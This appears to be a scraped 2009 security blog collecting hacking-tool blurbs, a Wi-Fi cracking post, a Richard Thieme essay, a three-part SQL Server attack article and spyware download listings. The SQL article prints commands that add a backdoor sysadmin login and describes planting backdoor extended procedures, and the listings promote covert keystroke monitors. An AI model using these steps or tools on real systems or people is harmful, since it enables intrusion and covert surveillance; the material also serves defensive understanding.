L0phtcrack : Windows password auditing and recovery application
L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009.

SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.

Pwdump : A window password recovery tool
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.

RainbowCrack : An Innovative Password Hash Cracker
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

#10

Brutus : A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.

2009-09-25T07:56:00.000-07:00

How to Hack Wireless Internet Connections

How to Hack Wireless Internet Connections

Explains how to ethically hack a wifi wireless internet connection using free hacking software.Have a laptop, or a wireless internet card in your PC? Have you ever been in the position that where you lost your WEP / WPA key, and you interested on retrieving it back? Well with Aircrack you can.Aircrack is a set of tools for auditing wireless networks. It consists of: airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
http://multisoftware-worldwide.blogspot.com
I have used aircrack to try and hack my own wireless network and I happy to say I am as secure as I can get wirelessly. Again Aircrack comes with the four following pieces of software to help you secure your wireless internet connection
airodump (an 802.11 packet capture program)
aireplay (an 802.11 packet injection program)
aircrack (static WEP and WPA-PSK cracking)
airdecap (decrypts WEP/WPA capture files)External Links

Visit Aircrack on Freshmeat.com Download
Download the Package (Working Mirror)

2009-09-25T07:55:00.000-07:00

Ethical Hacking Student Books

ETHICAL HACKING BOOKS:

By explaining computer security and outlining methods to test computer systems for possible weaknesses, this guide to system security provides the tools necessary for approaching computers with the skill and understanding of an outside hacker. A useful tool for those involved in securing networks from outside tampering, this guide to CEH 312-50 certification provides a vendor-neutral perspective for security officers, auditors, security professionals, site admistrators, and others concerned with the integrity of network infrastructures. Complete coverage of footprinting,

http://multisoftware-worldwide.blogspot.com

trojans and backdoors, sniffers, viruses and worms, and hacking Novell and Linux exposes common vulnerabilities and reveals the tools and methods used by security professionals when implementing countermeasures.

Download link:

Ethical hacking Student Guide

2009-09-25T07:54:00.001-07:00

Hacking Rules

Rules Of Hacking:

Real Hacking Rules!Or, Before the Word is Totally Useless, What Is the Essence of Hacking?by Richard Thieme10/04/2002
On the tenth anniversary of Def Con, the annual Las Vegas meeting of computer hackers, security professionals, and others, I reflected on how the con--and hacking--had changed since I spoke at Def Con 4 seven years earlier.

The word hacker today means everything from digging into a system--any system--at root level to defacing a Web site with graffiti. Because we have to define what we mean whenever we use the term, the word is lost to common usage. Still, post 9/11 and the Patriot Act, it behooves hackers of any definition to be keenly aware of the ends to which they hack. Hackers must know their roots and know how to return to "root" when necessary.
At Def Con 4 I said that hacking was practice for transplanetary life in the 21st century. I was right. The skills I foresaw as essential just a short generation ahead have indeed been developed by the best of the hacker community, who helped to create--and secure--the Net that is now ubiquitous. But the game of building and cracking security, managing multiple identities, and obsessing over solving puzzles is played now on a ten-dimensional chess board. Morphing boundaries at every level of organizational structure have created a new game.
In essence, hacking is a way of thinking about complex systems. It includes the skills required to cobble together seemingly disparate pieces of a puzzle in order to understand the system; whether modules of code or pieces of a bigger societal puzzle, hackers intuitively grasp and look for the bigger picture that makes sense of the parts. So defined, hacking is a high calling. Hacking includes defining and defending identity, creating safe boundaries, and searching for the larger truth in a maze of confusion and intentional disinformation.
Related Reading
Database NationThe Death of Privacy in the 21st CenturyBy Simson Garfinkel
Table of Contents Index Sample Chapters Read Online--Safari Search this book on Safari:
Only This Book All of SafariCode Fragments only
In the national security state that has evolved since World War II, hacking is one means by which a free people can retain freedom. Hacking includes the means and methodologies by which we construct more comprehensive truths or images of the systems we hack.
Hackers cross disciplinary lines. In addition to computer hackers, forensic accountants (whistleblowers, really), investigative journalists ("conspiracy theorists"), even shamans are hackers because hacking means hacking both the system and the mind that made it. That's why, when you finally understand Linux, you understand ... everything.
The more complex the system, the more challenging the puzzles, the more exhilarating the quest. Edward O. Wilson said in Consilience that great scientists are characterized by a passion for knowledge, obsessiveness, and daring.
Real hackers too.
The Cold War mentality drew the geopolitical map of the world as opposing alliances; now the map is more complex, defining fluid alliances in terms of non-state actors, narcotics/weapons-traffickers, and incendiary terrorist cells. Still, the game is the same: America sees itself as a huge bulls-eye always on the defensive.
In this interpretation, the mind of society is both target and weapon and the management of perception--from deception and psychological operations to propaganda, spin, and public relations--is its cornerstone.
That means that the modules of truth that must be connected to form the bigger picture are often exchanged in a black market. The machinery of that black market is hacking.
Here's an example:
A colleague was called by a source after a major blackout in the Pacific Northwest. The source claimed that the official explanation for the blackout was bogus. Instead, he suggested, a non-state aggressor such as a narco-terrorist had probably provided a demonstration of power, attacking the electric grid as a show of force.
"The proof will come," he said, "if it happens again in a few days."
A few days later, another blackout hit the area.
Fast-forward to a security conference at which an Army officer and I began chatting. One of his stories made him really chuckle.
"We were in the desert," he said, "testing an electromagnetic weapon. It was high-level stuff. We needed a phone call from the Secretary of Defense to hit the switch. When we did, we turned out the lights all over the Pacific Northwest." He added, "Just to be sure, we did it again a few days later and it happened again."
That story is a metaphor for life in a national security state.
That test took place in a secured area that was, in effect, an entire canyon. Cover stories were prepared for people who might wander in, cover stories for every level of clearance, so each narrative would fuse seamlessly with how different people "constructed reality."
The journalistic source was correct in knowing that the official story didn't account for the details. He knew it was false but didn't know what was true. In the absence of truth, we make it up. Only when we have the real data, including the way the data has been rewritten to obscure the truth, can we know what is happening.
That's hacking on a societal level. Hacking is knowing how to discern or retrieve information beyond that which is designed for official consumption. It is abstract thinking at the highest level, practical knowledge of what's likely, or might, or must be true, if this little piece is true, informed by an intuition so tutored over time it looks like magic.
Post 9/11, the distinction between youthful adventuring and reconstituting the bigger picture on behalf of the greater good is critical. What was trivial mischief that once got a slap on the wrist is now an act of terrorism, setting up a teenager for a long prison term. The advent of global terrorism and the beginning of the Third World War have changed the name of the game.
Yet without checks and balances, we will go too far in the other direction. The FBI in Boston is currently notorious for imprisoning innocent men to protect criminal allies.
http://multisoftware-worldwide.blogspot.com
I would guess that the agents who initiated that strategy had good intentions. But good intentions go awry. Without transparency, there is no truth. Without truth, there is no accountability. Without accountability, there is no justice.
Hacking ensures transparency. Hacking is about being free in a world in which we understand that we will never be totally free.
Nevertheless, hackers must roll the boulder up the hill. They have no choice but to be who they are. But they must understand the context in which they work and the seriousness of the consequences when they don't.
Hackers must, as the Good Book says, be wise as serpents and innocent as doves.
Richard Thieme is a business consultant, writer, and professional speaker focused on "life on the edge," in particular the human dimension of technology and the work place, change management and organizational effectiveness.

2009-09-25T07:51:00.000-07:00

MYSQL Server Hacking [Part 3]

Why not revoke authorization?
Chris Anley in his document entitled "Violating Database - Enforced Security Mechanisms" [6] described an approach to enhancing security, which involves a modification of SQL Server functioning to ignore queries from anyone but “sa” users. His invention is based on the idea of handling authorization procedure exceptions by the SQL Server code. “Rather than attempting a static analysis of the entire SQL server codebase, a little debugging up front will probably point us in the right direction”. Of course, such a change is feasible under particular conditions – either by manipulating the executable file that contains the SQL server codebase or by making operations on the in-memory image –in both cases, the SQL Server System Administrator is the only person authorized to do this. However, this is a simplified situation. The reality is rather bleak. Before entering in further detail, let me remind you that the observance of current security bulletins is of top importance, otherwise the buffer might overflow.
Why is a buffer overrun problem of concern? As you may remember, SQL Server has many default extended stored procedures i.e. DLL functions that come with SQL Server. They are written in any high level language (for example C) and then compiled as a DLL. On starting to run, they read user’s parameters to the memory buffer. However as may happen for whatever reason, the programmer may forget to encrypt the data check being placed into variables in the program – and if an attacker sends too much data, it is possible for the data to "overflow" the predetermined size and write the data to adjacent areas of the computer buffer. This buffer overflow may allow malicious users to run arbitrary commands on the remote system. (See, for example, “Analysis of Buffer Overflow Attacks “ by Piotr Frej and Maciej Ogórkiewicz). The problem is that Microsoft SQL Server contains procedures that are vulnerable to buffer overflow attacks. These are both the previously described extended stored procedures as well as functions implemented in the Transact-SQL language (an example may be the previously mentioned "pwdencrypt" function). This may also happen with OLEDB libraries, which are COM objects loaded in the client process. Remember, that in the COM context, every component-based program becomes a client. Whenever the OPENROWSET command is activated, SQL Server becomes a client of the data provider, which makes it automatically vulnerable to errors in the code of a particular OLEDB. For those interested, you might wish to read various security bulletins [7] for details of problems and proposed solutions. If so, be aware that a successful buffer overflow attack means that every user may run arbitrary code on the SQL server in the context of a local administrator account. And as we already know, these (“sa”) privileges allow for arbitrary manipulation of SQL service, nevertheless we are still left with the following problem – how powerful are the "sa" privileges in the operating system context?
They are equally powerful to the SQL service and, reasoning strictly in security terms, these privileges correspond to those of the SQLSERVR.EXE process. By “standard” default, SQL Server includes several very powerful extended stored procedures to communicate with the operating system. Just to mention some of them:. "xp_cmdshell", "sp_OACreate", "xp_regwrite", "xp_instance_regwrite", "xp_adsirequest". Though some of them are documented (two first ones), we are still uncertain of the effects of others. Using these procedures, SQL Server administrators can interact with the operating system only limited by the authorizations for the MSSQLServer service. If it were a case of running this service in the LocalSystem account, the "sa" would have been granted top privileges to access the Desktop but not the network directories.
http://multisoftware-worldwide.blogspot.com
The attacker may make use of these privileges as illustrated in Figure 4.
FIGURE 4: Using the "sa" account to upload a program from the Internet to the server.

If, instead, we run the service with a domain account, which has access to the network, then the “sa” user might access the whole network. However, for regular user accounts this will be a surprise. The "sa" account privileges depend on how the MSSQLServer service has been configured. In the SQL Server documentation it is clearly stated that the MSSQLServer account is a user account and not a system account. Even though recently we have read in Microsoft Security Bulletins dealing with SQL Server: “SQL Server 2000 can run under a non-administrator account, however it requires full access to registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSSQLServer”
Having this access level, the SQL server process is able to modify an "ObjectName" value in the registry. It contains the name of the account that is necessary to run the service. This is enough to re-configure the service to run as LocalSystem. Hence, an attacker who is able to run code under an SQL Server account is able to re-configure a service to run under the highest possible local privileges, even if SQL Server is running as a regular user! This problem has been addressed in the third section of the Microsoft Security Bulletin MS02-034 [8]. To read about the permissions required by SQL Server, refer to the SQL Server 2000 Security document [9]
LocalSystem by default?
Microsoft SQL Server 2000 Desktop Edition (MSDE 2000), the latest version of MSDE is installed with the LocalSystem account as a default. Of course, this creates potential vulnerability to attacks as described above. Naturally, patching SQL Server to Service Pack 3 enhances security – but of the SQL Server service itself, not the machine on which it is running. Instead, having installed SP3, you can experience problems if the server is running somewhere other than the LocalHost. This is a consequence of the permissions that are set to the registry key and the file system with the installation of SP3. Of course, minimizing unwanted privileges is a positive factor but leaving this approach with insufficient documentation is bad practice. Included below is some basic information to help one complete the documentation as required.
In order to reduce MSDE –associated privileges in the operating system:
Replace both the MSSQLServer and SQLServerAgent service accounts (with LocalSystem) with a selected account
Provide this new account with the right to read in the C:\Program Files\Microsoft SQL Server\MSSQL directory, remembering to check the "Reset permissions on all child objects" option in the Advanced dialog box
Grant full privileges in DATA and LOG sub-directories for this new account
Run the registry using regedt32.exe (in such a manner so as to allow for editing of privileges - use regedit.exe if in Windows XP) and grant full permissions for the account in the registry key: HKLM\SOFTWARE\Microsoft\MSSQLServer. Re-run the "Reset permissions on all child objects ..."
Grant read permission to the account (read only!) in the registry key HKLM\SYSTEM\CurrentControlSet\Services\MSSQLSERVER
Run the MSSQLServer service
Add the service account to the sysadmin server role (to support the SQLServerAgent service), using the following SQL commands:
1> sp_grantlogin 'COMPUTER\account_sql'2> goGranted login access to 'COMPUTER\account_sql'.1> sp_addsrvrolemember 'COMPUTER\account_sql','sysadmin'2> go'COMPUTER\account_sql' added to role 'sysadmin'.
Run the SQLServerAgent service
SQL commands are to be run using the osql.exe program under the system administrator account specifying the E parameter. Obviously, you should specify the real name of the SQL service account that must be preceded with the machine name. If you not wish to grant access to your MSDE server from the network, disable the following registry key:
HKLM\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib
For obvious reasons, it is good practice to export this registry key to the .reg file earlier on. If problems arise with starting MSDE service, use FileMon and RegMon programs available at www.sysinternals.com - these are very useful tools when analyzing and remedying difficulties resulting from over-restrictive constraints posed on registry keys or file systems. It is also worth consulting the SQL Server 2000 Documentation

2009-09-25T07:49:00.000-07:00

MYSQL Server Hacking [Part 2]

Of course, the reader may now wish to remark "But after all, my users are not allowed to run ad hoc queries on the SQL Server!” However, close examination shows this to be a rather dubious claim, because the possibility or impossibility of placing deliberately created queries in an SQL Server application does not necessarily imply that the same rule is valid for the server itself! Even though a specific application is apparently secured against such a situation, I would suggest that you reconsider this idea that all scripts are protected against SQL injection attacks" [1][2] What if the user, when defining query conditions, may attach a table to the results? And what is the server-defined authentication scheme to be applied for potential users? Even presuming that the application is well protected against unauthorized access to the data, the user himself cannot run standard communication tools on his computer to connect the SQL server- osql.exe, VBScript that uses ADO, or any other program that runs ODBC (or OLEDB) directly on the database server. Knowledge of the SQL Server password is the only prerequisite. Yet, in many situations, the possibility of authentication of local network users in the Directory Services is sufficient. However don't let paranoia set in - we must simply accept that the possibility of user authentication by the SQL Server is associated with the automatic right to ask probing, or even indiscreet questions.
What are the conclusions?
Let us look once again at the above example of a query that returns the account names – some of them are defined on the SQL server and are recognizable by the 0 value in the "isntname" column. If configured to perform authentication in Mixed Authentication Mode, the SQL Server will accept attempts to login on these accounts, while not disabling the account on repeated attempts. This is the drawback of the mechanism by which the SQL Server authenticates connections in mixed mode.
http://multisoftware-worldwide.blogspot.com
Fortunately, its use is optional and even when it is present, it is not recommended, because it creates opportunities for a brute force attack in which each possible key or password is attempted until the correct one is found. Of course, a hacker may do this using a suitable program to automate such work (I, will not enter into details for obvious reasons). The most “appreciated” is an "sa" (System Administrator) account, which has access to everything as created specifically for the SQL server (It is similar to root on Linux or LocalSystem in Windows NT). It has the rights to manage any database (the "master" database included), full access to perform any function on the SQL Server and even to run processes that are inherited by the server’s service, namely the SQLSERVR.EXE process. Moreover, in many installations, SQL Server runs in the security context of the machine’s administrator - thereby the "sa" user can manage a computer with the MS SQL Server service installed, apart from managing all databases. When working with MSDE, the situation is even worse - the service is installed under LocalSystem, with a default "sa" account with a BLANK password! Figure 3 illustrates two consecutive attempts to hack the "sa" account, one failed attempt and another successful.
FIGURE 3: Two attacks on an "sa" account with a blank password – the second attempt is successful.

Using the System Administrator account
First and foremost, the "sa" user has control over all SQL server data, scheme and setup. It is not necessary here to enter into details, because the list of system administrator privileges can contain almost anything. Instead, let us focus on certain purposely-selected types of malicious attacks. The simplest one consists in creating a new account with the same privileges as the "sa" user has. The listing below is an example:
1> sp_addlogin 'hacked','h4xor'2> goNew login created.1> sp_addsrvrolemember 'hacked','sysadmin'2> go'hacked' added to role 'sysadmin'.1> quitC:\>osql -U hacked -P h4xor -Q "SELECT DB_NAME(),USER_NAME()" -------- ------- master dbo(1 row affected)C:\>
In lieu of the "sp_addlogin" procedure one may use, for example, "sp_grantlogin" – the latter will establish an account being authenticated by the operating system on which the SQL server is running. I would like to note, that it is very easy to gain "sa" privileges – just by assigning the sysadmin role to the selected user (or a group of users defined at the SQL Server setup phase) account. Apart from this role, the SQL Server service makes it possible to exploit some other feature that, however, cannot be used to fully manage the server. I’ll refer those interested to [3]. Of course, it cannot be excluded that the administrator will detect such an account (even if its name does not stand out as anything unusual). If so, a hacker has no other options but to use the existent account – the simplest way would be to modify the password employing the "sp_password" procedure. If an intruder wishes to cover his tracks, he may attempt to decipher passwords, which give users access to the server. One might wish to remember at this point that in mixed mode authentication, the SQL Server can use its own authentication mechanism which stores information not only on account names (similar to the operating system based authentication) but also on passwords. This is done in the "password" column of the sysxlogins table- it contains a hash of the user's password produced by the pwdencrypt() function. This is a fairly well known fact brilliantly described by David Litchfield in [4]. The tools that can be used to perform brute force attacks are explained in [5]. If your SQL Server is not configured for SQL Server authentication, you don't have to worry about getting hacked in the above manner. A more malicious intruder may attempt to install a backdoor. Two possibilities are presented below.
Extended Stored Procedures
SQL Server features the possibility to run user-written procedures. These procedures can both be written in the SQL language and stored in any database, or they are dynamic link libraries (DLLs) that SQL Server can dynamically load and execute if required. This latter type is called "extended stored procedures" and means procedures that have interesting characteristics: they are added directly to the SQL Server and share the security context of the SQL Server executable. In practice, extended stored procedures can be made to run with „sa” privileges on the database. They can be defined only in the "master" database by which they can be added to the database by the administrator (the user "sa") only.
The default SQL Server configuration contains a virtually huge number of these procedures, however most of them are undocumented. Extended stored procedures can be made to run under different authentication schemes – certain procedures are made accessible for all users either by default or because the server’s functioning so requires. Only the system administrator can run other extended stored procedures. This creates a number of operational difficulties for the administrator especially in detecting “special” procedures that are likely to be embedded in the server by an intruder. It is sufficient to load a previously prepared DLL file to the computer (using the Open Data Services API, which is optionally installed with the SQL Server), then call the "sp_addextendedproc" procedure with its respective arguments, followed by granting the right to execute this procedure to all users (i.e. to the public user group). Such a procedure may then be used by a hacker to execute deliberate operations with “sa" privileges from any user account level!

2009-09-25T07:47:00.000-07:00

MYSQL Server Hacking [Part 1]

Microsoft SQL Server is a popular and robust environment for many applications that use databases – it features excellent multi-access capabilities, comprehensive security coverage and can easily be transported to other database platforms. Unfortunately, such potential will not be realized – notwithstanding the use of royalty-free MSDE (Microsoft Database Engine optimized for individual or small workgroup solutions) if adequate security protection to the databases is not provided as a minimum. Why is this must –have technology? Because high capabilities of the SQL Server are combined with high flexibility and too much flexibility may be detrimental if used in the wrong manner. This article aims to identify certain types of risks that might result from inappropriate management of the Microsoft SQL Server.
If properly configured, each SQL Server permits all users to access the master database, which contains all the settings for SQL Server – and all the information that SQL Server uses to open the databases. It also contains all SQL login IDs, data of connected servers etc. Of course, “normal” users are not allowed to access all information resources. Figure 1 illustrates how the server behaves if an attempt is made to access the account list – as can be seen, the server has prevented users from reading passwords.
http://multisoftware-worldwide.blogspot.com
Nevertheless, account names and databases (including the information stored on them) may be accessed by unprivileged users. An example showing a piece of information taken by a user is illustrated in Figure 2 below.
FIGURE 1: A failed attempt to access the account list.

FIGURE 2: When a normal user manages to access the account list.

scolling to the bottom of the screen in the screenshot above gives the final few lines of screen ouput, shown below:

(4 rows affected)

1> select name,dbid from sysdatabases

2> go

name
dbid
-------------------------------------------
----------------------
master
1
tempdb
2
model
3
msdb
4
pubs
5
Northwind
6
pages
7
(7 rows affected)
1>

As can be seen it is difficult to keep your data secure from users’ prying eyes.
However…

Click here for PART 2

2009-09-25T07:44:00.000-07:00

Top hacking tools

Hacker tools are programs written to access a computer system using known software vulnerability.

http://multisoftware-worldwide.blogspot.com

Most of these programs have been written and are freely distributed from “Hacker” websites. Some of these programs were written for legitimate uses and are abused as a hacking tool.

Coldlife 4.0

DeCSS 1.2b

FPort 1.33

NMap Win 1.2.12

John the Ripper 1.6

PCHelps Network Tracer

TCPIP Protector Pro 7.18

IntelliTamper

2009-09-25T06:44:00.001-07:00

RusRoute 1.4.2

File Size:	2792KB
Update Time:	2009-09-25
Developer:	http://multisoftware-worldwide.blogspot.com
Description:	Routing firewall with NAT, VPN, LAN to VPN Bridge, traffic counter.
Download:	RusRoute 1.4.2

2009-09-25T06:43:00.000-07:00

PC Tools Firewall Plus 6.0.0.69

File Size:	6564KB
Update Time:	2009-09-25
Developer:	http://www.pctools.com/ http://multisoftware-worldwide.blogspot.com/
Description:	http://multisoftware-worldwide.blogspot.com/ A personal firewall that protects your computer from intruders and controls the network traffic in and out of your PC
Download:	PC Tools Firewall Plus 6.0.0.69

2009-09-25T06:42:00.002-07:00

ZoneAlarm Security Suite 9.0.083.000

File Size:	51285KB
Update Time:	2009-09-25
Developer:	http://multisoftware-worldwide.blogspot.com
Description:	All-in-one PC protection with Firewall and Antivirus protection and more
Download:	ZoneAlarm Security Suite 9.0.083.000

2009-09-25T06:42:00.001-07:00

Hidetools Spy Monitor 5.60

File Size:	1610KB
Update Time:	2009-09-25
Developer:	http://multisoftware-worldwide.blogspot.com/
Description:	Log all PC activity - keystrokes, websites, programs, documents and screenshots. http://multisoftware-worldwide.blogspot.com/
Download:	Hidetools Spy Monitor 5.60

2009-09-25T06:41:00.004-07:00

AllSpyMonitor 3.29

File Size:	1367KB
Update Time:	2009-09-25
Developer:	http://multisoftware-worldwide.blogspot.com
Description:	Monitor and record computer and Internet activitie.
Download:	AllSpyMonitor 3.29

2009-09-25T06:41:00.003-07:00

dff-src-0.4.3

File Size:	1598KB
Update Time:	2009-09-25
Developer:	http://www.digital-forensic.org/ , http://multisoftware-worldwide.blogspot.com/
Description:	DFF (Digital Forensics Framework) is a simple but powerful tool with a flexible module system which will help you in your digital forensics works, including file recovery due to error or crash, evidence research and analysis, etc. http://multisoftware-worldwide.blogspot.com/ DFF provides a robust architecture and some handy modules.
Download:	dff-src-0.4.3

2009-09-25T06:41:00.001-07:00

Hidetools Child Control 5.34

File Size:	1402KB
Update Time:	2009-09-25
Developer:	http://www.plimus.com/ , http://multisoftware-worldwide.blogspot.com/
Description:	Protect your child from adult web sites, limit in games and monitor activity. http://multisoftware-worldwide.blogspot.com/
Download:	Hidetools Child Control 5.34

2009-09-25T06:40:00.002-07:00

Advanced_Network_Exploitation_2009.pdf

File Size:	50KB
Update Time:	2009-09-25
Developer:	http://www.aisecurityonline.com/ , http://multisoftware-worldwide.blogspot.com/
Description:	Whitepaper called Advanced Network Exploitation Research and Networking Concepts. This publication discusses various methodologies to use for network exploration. http://multisoftware-worldwide.blogspot.com/ It discusses everything from the basics of TCP/IP to firewalking.
Download:	Advanced_Network_Exploitation_2009.pdf

2009-09-25T06:40:00.001-07:00

Memory_Exploitation_Res_Publication.pdf

File Size:	12KB
Update Time:	2009-09-25
Developer:	http://www.aisecurityonline.com/ http://multisoftware-worldwide.blogspot.com/
Description:	Memory Exploitation for Beginners - http://multisoftware-worldwide.blogspot.com/ A whitepaper providing samples of buffer overflows for novice users.
Download:	Memory_Exploitation_Res_Publication.pdf

2009-09-25T06:39:00.002-07:00

Cibet 0.3

File Size:	316KB
Update Time:	2009-09-25
Developer:	http://multisoftware-worldwide.blogspot.com/
Description:	The cibet framework provides developers with interfaces and classes to introduce audit-proof archiving and logging and dual control mechanisms like four-eyes principle and six-eyes principle into their applications. http://multisoftware-worldwide.blogspot.com
Download:	Cibet 0.3